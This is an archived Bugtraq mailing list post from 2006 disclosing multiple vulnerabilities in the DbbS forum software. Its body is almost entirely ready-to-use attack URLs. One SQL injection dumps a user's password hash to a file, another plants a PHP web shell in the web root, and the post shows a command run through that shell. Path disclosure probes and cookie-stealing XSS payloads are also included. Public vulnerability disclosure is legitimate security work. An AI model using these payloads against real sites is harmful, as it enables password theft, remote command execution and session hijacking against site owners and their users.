lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060416034638.1791.qmail@securityfocus.com>
Date: 16 Apr 2006 03:46:38 -0000
From: yamcho@...l.it
To: bugtraq@...urityfocus.com
Subject: DbbS<=2.0-alpha Multiple Vulnerabilities


Special thanks to rgod for his help!!!

Full path disclosure

http://www.site.com/DbbS/topics.php?fcategoryid='
http://www.site.com/DbbS/script.php?unavariabile[]=
http://www.site.com/DbbS/script.php?GLOBALS[]=
http://www.site.com/DbbS/script.php?_SERVER[]=

MD5 Password

http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,pass%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\test.txt'%20FROM%20forum_membres%20WHERE%20id='1'/*

Create shell

http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,'<?php%20passthru($_GET[cmd]);?>'%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\suntzu.php'%20FROM%20forum_categories/*

Launch a command

http://www.site.com/DbbS/suntzu.php?cmd=dir

XSS

http://www.site.com/DbbS/profile.php?mode=edit&myid=1&ulocation="><script>alert(document.cookie)</script>

http://www.site.com/DbbS/profile.php?mode=edit&myid=1&uhobbies="><script>alert(document.cookie)</script>


by rgod and yamcho


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ